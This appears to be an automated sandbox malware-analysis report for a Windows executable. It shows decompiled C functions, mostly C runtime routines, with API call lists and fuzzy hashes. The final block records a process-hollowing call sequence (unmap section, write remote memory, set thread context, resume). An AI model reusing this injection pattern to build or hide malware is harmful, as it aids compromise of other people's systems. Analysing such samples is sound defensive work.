                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                • String ID:
                • API String ID: 2714421763-0
                • Opcode ID: eb8e81c6b77b426a5da76bfed92e118ebfce9407ed76ce54dbf260f0ae8900db
                • Instruction ID: 8aa7a4ab30bbc867df2973424b9b26a8bcea8968b0616659199c0ec633f1b38e
                • Opcode Fuzzy Hash: eb8e81c6b77b426a5da76bfed92e118ebfce9407ed76ce54dbf260f0ae8900db
                • Instruction Fuzzy Hash: 09012C71A05212AADF20BBA1AC0675F3A649F11728F21803FF507B61D2DA7CD9909E5D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 19%
                			E00405AA0(void* __ebx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                				void* __ebp;
                				void* _t20;
                				void* _t22;
                				void* _t23;
                				intOrPtr* _t25;
                				void* _t26;
                				void* _t27;
                
                				_t26 = __esi;
                				_t25 = __edi;
                				_t22 = __ebx;
                				_t29 = _a20;
                				if(_a20 != 0) {
                					_push(_a20);
                					_push(__ebx);
                					_push(__esi);
                					_push(_a4);
                					E00405A0E(__ebx, __edi, __esi, _t29);
                					_t27 = _t27 + 0x10;
                				}
                				_t30 = _a28;
                				_push(_a4);
                				if(_a28 != 0) {
                					_push(_a28);
                				} else {
                					_push(_t26);
                				}
                				E00404F8E(_t23);
                				_push( *_t25);
                				_push(_a16);
                				_push(_a12);
                				_push(_t26);
                				E00405478(_t22, _t25, _t26, _t30);
                				_push(0x100);
                				_push(_a24);
                				_push(_a16);
                				 *((intOrPtr*)(_t26 + 8)) =  *((intOrPtr*)(_t25 + 4)) + 1;
                				_push(_a8);
                				_push(_t26);
                				_push(_a4);
                				_t20 = E004056F3( *((intOrPtr*)(_t22 + 0xc)));
                				if(_t20 != 0) {
                					E00404F47(_t20, _t26);
                					return _t20;
                				}
                				return _t20;
                			}
                0x00405aa0
                0x00405aa0
                0x00405aa0
                0x00405aa5
                0x00405aa9
                0x00405aab
                0x00405aae
                0x00405aaf
                0x00405ab0
                0x00405ab3
                0x00405ab8
                0x00405ab8
                0x00405abb
                0x00405abf
                0x00405ac2
                0x00405ac7
                0x00405ac4
                0x00405ac4
                0x00405ac4
                0x00405aca
                0x00405acf
                0x00405ad1
                0x00405ad4
                0x00405ad7
                0x00405ad8
                0x00405ae0
                0x00405ae5
                0x00405ae9
                0x00405aec
                0x00405aef
                0x00405af5
                0x00405af6
                0x00405af9
                0x00405b03
                0x00405b07
                0x00000000
                0x00405b07
                0x00405b0d

                APIs
                • ___BuildCatchObject.LIBCMT ref: 00405AB3
                  • Part of subcall function 00405A0E: ___BuildCatchObjectHelper.LIBCMT ref: 00405A44
                • _UnwindNestedFrames.LIBCMT ref: 00405ACA
                • ___FrameUnwindToState.LIBCMT ref: 00405AD8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                • String ID: csm
                • API String ID: 2163707966-1018135373
                • Opcode ID: 52055c2f57884fc084d47f376315b0f0a4211951245ac75f0d5f08d58a2915df
                • Instruction ID: a47f7dfc7554e592a1b86253121fc9585904a35423a575559cafd4c39be57d8f
                • Opcode Fuzzy Hash: 52055c2f57884fc084d47f376315b0f0a4211951245ac75f0d5f08d58a2915df
                • Instruction Fuzzy Hash: 9C017871100509BBCF12AF01CC45EAB3F6AEF44344F00412ABD08241A1C73AA8A1EFA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E0040E78B() {
                				signed long long _v12;
                				signed int _v20;
                				signed long long _v28;
                				signed char _t8;
                
                				_t8 = GetModuleHandleA("KERNEL32");
                				if(_t8 == 0) {
                					L6:
                					_v20 =  *0x4023a0;
                					_v28 =  *0x402398;
                					asm("fsubr qword [ebp-0x18]");
                					_v12 = _v28 / _v20 * _v20;
                					asm("fld1");
                					asm("fcomp qword [ebp-0x8]");
                					asm("fnstsw ax");
                					if((_t8 & 0x00000005) != 0) {
                						return 0;
                					} else {
                						return 1;
                					}
                				} else {
                					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                					if(__eax == 0) {
                						goto L6;
                					} else {
                						_push(0);
                						return __eax;
                					}
                				}
                			}

                APIs
                • GetModuleHandleA.KERNEL32(KERNEL32,00409CAA), ref: 0040E790
                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040E7A0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: IsProcessorFeaturePresent$KERNEL32
                • API String ID: 1646373207-3105848591
                • Opcode ID: 1e6ec4a4387cd50c321e0f6e22b65e3f93e02cc2916a32b505df3e4a77ea7276
                • Instruction ID: 3a6cb4fc998e183041992d2f952b65302eb0dc8fb54f045fb071081984a9eedc
                • Opcode Fuzzy Hash: 1e6ec4a4387cd50c321e0f6e22b65e3f93e02cc2916a32b505df3e4a77ea7276
                • Instruction Fuzzy Hash: 73F03020A00A09E6DB042BB1AE0E36F7A78BB80742F9508B1E5D2F10D4DF7C8071D25A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E0040542F(intOrPtr* _a4) {
                				signed int _v8;
                				intOrPtr _t11;
                				intOrPtr* _t15;
                				intOrPtr* _t19;
                				void* _t23;
                				void* _t24;
                				void* _t25;
                				void* _t26;
                
                				_t11 =  *((intOrPtr*)( *_a4));
                				if(_t11 == 0xe0434f4d) {
                					__eflags =  *((intOrPtr*)(E00409336(_t23, _t24, __eflags) + 0x90));
                					if(__eflags > 0) {
                						_t15 = E00409336(_t23, _t24, __eflags) + 0x90;
                						 *_t15 =  *_t15 - 1;
                						__eflags =  *_t15;
                					}
                					goto L5;
                				} else {
                					_t32 = _t11 - 0xe06d7363;
                					if(_t11 != 0xe06d7363) {
                						L5:
                						__eflags = 0;
                						return 0;
                					} else {
                						 *(E00409336(_t23, _t24, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
                						_push(8);
                						_push(0x4284a0);
                						E00407404(_t23, _t25, _t26);
                						_t19 =  *((intOrPtr*)(E00409336(_t23, _t24, _t32) + 0x78));
                						if(_t19 != 0) {
                							_v8 = _v8 & 0x00000000;
                							 *_t19();
                							_v8 = 0xfffffffe;
                						}
                						return E00407449(E0040D9F8(_t23, _t24, _t25));
                					}
                				}
                			}


                APIs
                • __getptd.LIBCMT ref: 00405449
                  • Part of subcall function 00409336: __getptd_noexit.LIBCMT ref: 00409339
                  • Part of subcall function 00409336: __amsg_exit.LIBCMT ref: 00409346
                • __getptd.LIBCMT ref: 0040545A
                • __getptd.LIBCMT ref: 00405468
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: MOC
                • API String ID: 803148776-624257665
                • Opcode ID: 2a60fa349f73d5ebf537322a8e0832c8dd4f06d0dbb62005c58b9533d6aa8f36
                • Instruction ID: 918537145168455b6401ea16aac596ce78ad9945df75791b6ab05e5e20afc3e1
                • Opcode Fuzzy Hash: 2a60fa349f73d5ebf537322a8e0832c8dd4f06d0dbb62005c58b9533d6aa8f36
                • Instruction Fuzzy Hash: A8E01A325401089FDB20AA66C047B6A3394EB48319F1541B6A848EB3E3C73CEC909D4A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040E677(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                				intOrPtr _t25;
                				void* _t26;
                				void* _t28;
                
                				_t25 = _a16;
                				if(_t25 == 0x65 || _t25 == 0x45) {
                					_t26 = E0040DF68(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                					goto L9;
                				} else {
                					_t34 = _t25 - 0x66;
                					if(_t25 != 0x66) {
                						__eflags = _t25 - 0x61;
                						if(_t25 == 0x61) {
                							L7:
                							_t26 = E0040E058(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                						} else {
                							__eflags = _t25 - 0x41;
                							if(__eflags == 0) {
                								goto L7;
                							} else {
                								_t26 = E0040E57D(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                							}
                						}
                						L9:
                						return _t26;
                					} else {
                						return E0040E4C2(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                					}
                				}
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                • Instruction ID: acc13cb3f66903cd5af19021ab7f63e6ce0173ce80a6ae777747199e4b011bbd
                • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                • Instruction Fuzzy Hash: 2E11873240014EBBCF125E86DC01CEE3F22BB28354F588826FA19651B0C63BC971AB89
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E0040BE5C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                				signed int _t13;
                				intOrPtr _t27;
                				intOrPtr _t29;
                				void* _t30;
                				void* _t31;
                
                				_t31 = __eflags;
                				_t26 = __edi;
                				_t25 = __edx;
                				_t22 = __ebx;
                				_push(0xc);
                				_push(0x428580);
                				E00407404(__ebx, __edi, __esi);
                				_t29 = E00409336(__ebx, __edx, _t31);
                				_t13 =  *0x42acec; // 0xfffffffe
                				if(( *(_t29 + 0x70) & _t13) == 0) {
                					L6:
                					E00409F79(_t22, _t26, 0xc);
                					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                					_t8 = _t29 + 0x6c; // 0x6c
                					_t27 =  *0x42add0; // 0x42acf8
                					 *((intOrPtr*)(_t30 - 0x1c)) = E0040BE1E(_t8, _t27);
                					 *(_t30 - 4) = 0xfffffffe;
                					E0040BEC6();
                				} else {
                					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                						goto L6;
                					} else {
                						_t29 =  *((intOrPtr*)(E00409336(_t22, __edx, _t33) + 0x6c));
                					}
                				}
                				if(_t29 == 0) {
                					E0040850D(_t25, 0x20);
                				}
                				return E00407449(_t29);
                			}

                APIs
                • __getptd.LIBCMT ref: 0040BE68
                  • Part of subcall function 00409336: __getptd_noexit.LIBCMT ref: 00409339
                  • Part of subcall function 00409336: __amsg_exit.LIBCMT ref: 00409346
                • __getptd.LIBCMT ref: 0040BE7F
                • __amsg_exit.LIBCMT ref: 0040BE8D
                • __lock.LIBCMT ref: 0040BE9D
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                • String ID:
                • API String ID: 3521780317-0
                • Opcode ID: 303b6b54ffc088d61ac8b527bf232a5405e04159464000db62d750175085c295
                • Instruction ID: 220dff93fc0e225ca4262bf9140b722410d7ca19c554bdb0cc60d2889c129db6
                • Opcode Fuzzy Hash: 303b6b54ffc088d61ac8b527bf232a5405e04159464000db62d750175085c295
                • Instruction Fuzzy Hash: B0F01231A547009FD631AB76D40378E73A0AF00718F54457FA941B72D2DB7CAD419ADE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00407253() {
                				intOrPtr _t5;
                				intOrPtr _t6;
                				intOrPtr _t10;
                				void* _t12;
                				intOrPtr _t15;
                				intOrPtr* _t16;
                				signed int _t19;
                				signed int _t20;
                				intOrPtr _t26;
                				intOrPtr _t27;
                
                				_t5 =  *0x66f720;
                				_t26 = 0x14;
                				if(_t5 != 0) {
                					if(_t5 < _t26) {
                						_t5 = _t26;
                						goto L4;
                					}
                				} else {
                					_t5 = 0x200;
                					L4:
                					 *0x66f720 = _t5;
                				}
                				_t6 = E0040BF86(_t5, 4);
                				 *0x66e708 = _t6;
                				if(_t6 != 0) {
                					L8:
                					_t19 = 0;
                					_t15 = 0x42a288;
                					while(1) {
                						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                						_t15 = _t15 + 0x20;
                						_t19 = _t19 + 4;
                						if(_t15 >= 0x42a508) {
                							break;
                						}
                						_t6 =  *0x66e708;
                					}
                					_t27 = 0xfffffffe;
                					_t20 = 0;
                					_t16 = 0x42a298;
                					do {
                						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x66f740 + (_t20 >> 5) * 4))));
                						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                							 *_t16 = _t27;
                						}
                						_t16 = _t16 + 0x20;
                						_t20 = _t20 + 1;
                					} while (_t16 < 0x42a2f8);
                					return 0;
                				} else {
                					 *0x66f720 = _t26;
                					_t6 = E0040BF86(_t26, 4);
                					 *0x66e708 = _t6;
                					if(_t6 != 0) {
                						goto L8;
                					} else {
                						_t12 = 0x1a;
                						return _t12;
                					}
                				}
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: __calloc_crt
                • String ID: f
                • API String ID: 3494438863-2991006914
                • Opcode ID: 5b630ee3d2dbdbebf626194c9593dd7727521db8961ea863eba059166b8ee4f8
                • Instruction ID: 5b1c1a8068189c125be6ca11bca271ebadba2b5e15edd28ae59a5051adca66c0
                • Opcode Fuzzy Hash: 5b630ee3d2dbdbebf626194c9593dd7727521db8961ea863eba059166b8ee4f8
                • Instruction Fuzzy Hash: 29110631B0D211ABF7288B2DBC916623782E745728B24527FF500EB3D0E77DE881469E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E00405819(void* __ebx, void* __edi, intOrPtr* __esi) {
                				intOrPtr _t17;
                				void* _t26;
                				intOrPtr* _t28;
                				void* _t29;
                				void* _t30;
                
                				_t28 = __esi;
                				_t19 = __ebx;
                				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                				E00405289(__ebx, __edi, __esi,  *((intOrPtr*)(_t29 - 0x28)));
                				 *((intOrPtr*)(E00409336(__ebx, _t26, _t30) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                				_t17 = E00409336(_t19, _t26, _t30);
                				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                					_t17 =  *((intOrPtr*)(__esi + 0x14));
                					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                						if( *((intOrPtr*)(_t29 - 0x34)) == 0 &&  *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                							_t17 = E00405262( *((intOrPtr*)(_t28 + 0x18)));
                							_t38 = _t17;
                							if(_t17 != 0) {
                								_push( *((intOrPtr*)(_t29 + 0x10)));
                								_push(_t28);
                								return E0040559E(_t38);
                							}
                						}
                					}
                				}
                				return _t17;
                			}

                APIs
                  • Part of subcall function 00405289: __getptd.LIBCMT ref: 0040528F
                  • Part of subcall function 00405289: __getptd.LIBCMT ref: 0040529F
                • __getptd.LIBCMT ref: 00405828
                  • Part of subcall function 00409336: __getptd_noexit.LIBCMT ref: 00409339
                  • Part of subcall function 00409336: __amsg_exit.LIBCMT ref: 00409346
                • __getptd.LIBCMT ref: 00405836
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: csm
                • API String ID: 803148776-1018135373
                • Opcode ID: c3afd64fdfd2f2d8d217d39c8847acdcb15bae71fc736d0782f49ac46d94bf0d
                • Instruction ID: 6d7eef5c8a6a22c85478be91105518180ffb2f651ccb154911799a14910a4cc3
                • Opcode Fuzzy Hash: c3afd64fdfd2f2d8d217d39c8847acdcb15bae71fc736d0782f49ac46d94bf0d
                • Instruction Fuzzy Hash: A2010436800A059FCB38AE66C5416AFB3A9EF14315F58843FEC40766E1CB3889A1CE49
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 23%
                			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                				char _v8;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				void* _t11;
                				void* _t16;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t20;
                				void* _t21;
                
                				_t22 = __eflags;
                				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                				_t17 = _a4;
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                				if(_t11 != 0) {
                					_push(_a16);
                					_push(_v8);
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, _t20); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				return __eax;
                			}

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000001.00000002.570929450.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000001.00000002.570929450.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 17%
                			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t11;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t22;
                
                				_t23 = __eflags;
                				asm("out 0x95, eax");
                				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                				_t17 =  *((intOrPtr*)(_t22 + 8));
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                				if(_t11 != 0) {
                					_push( *((intOrPtr*)(_t22 + 0x14)));
                					_push( *((intOrPtr*)(_t22 - 4)));
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, __edi); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000001.00000002.570929450.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 17%
                			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t8;
                				void* _t11;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t22;
                
                				_t23 = __eflags;
                				asm("sbb ebx, ebp");
                				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                				_t17 =  *((intOrPtr*)(_t22 + 8));
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                				if(_t11 != 0) {
                					_push( *((intOrPtr*)(_t22 + 0x14)));
                					_push( *((intOrPtr*)(_t22 - 4)));
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, __edi); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000001.00000002.570929450.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 20%
                			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t10;
                				void* _t13;
                				intOrPtr* _t19;
                				void* _t22;
                				void* _t25;
                
                				_t26 = __eflags;
                				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                				_t19 =  *((intOrPtr*)(_t25 + 8));
                				Sleep(0x1388);
                				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                				if(_t13 != 0) {
                					_push( *((intOrPtr*)(_t25 + 0x14)));
                					_push( *((intOrPtr*)(_t25 - 4)));
                					_push(_t13);
                					_push(_t19); // executed
                					L00401455(0x60, _t22, __edi); // executed
                				}
                				 *_t19(0xffffffff, 0); // executed
                				_t19 = _t19 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000001.00000002.570929450.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00820156
                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0082016C
                • CreateProcessA.KERNELBASE(?,00000000), ref: 00820255
                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00820270
                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00820283
                • GetThreadContext.KERNELBASE(00000000,?), ref: 0082029F
                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008202C8
                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 008202E3
                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00820304
                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0082032A
                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00820399
                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008203BF
                • SetThreadContext.KERNELBASE(00000000,?), ref: 008203E1
                • ResumeThread.KERNELBASE(00000000), ref: 008203ED
                • ExitProcess.KERNEL32(00000000), ref: 00820412
                Memory Dump Source
                • Source File: 00000005.00000002.622893352.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                Similarity
                • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                • String ID:
                • API String ID: 2875986403-0
                • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction ID: 401bc510db23d613e968c2a9581edff8438624b0c123ab5150f376b716fe20db
                • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
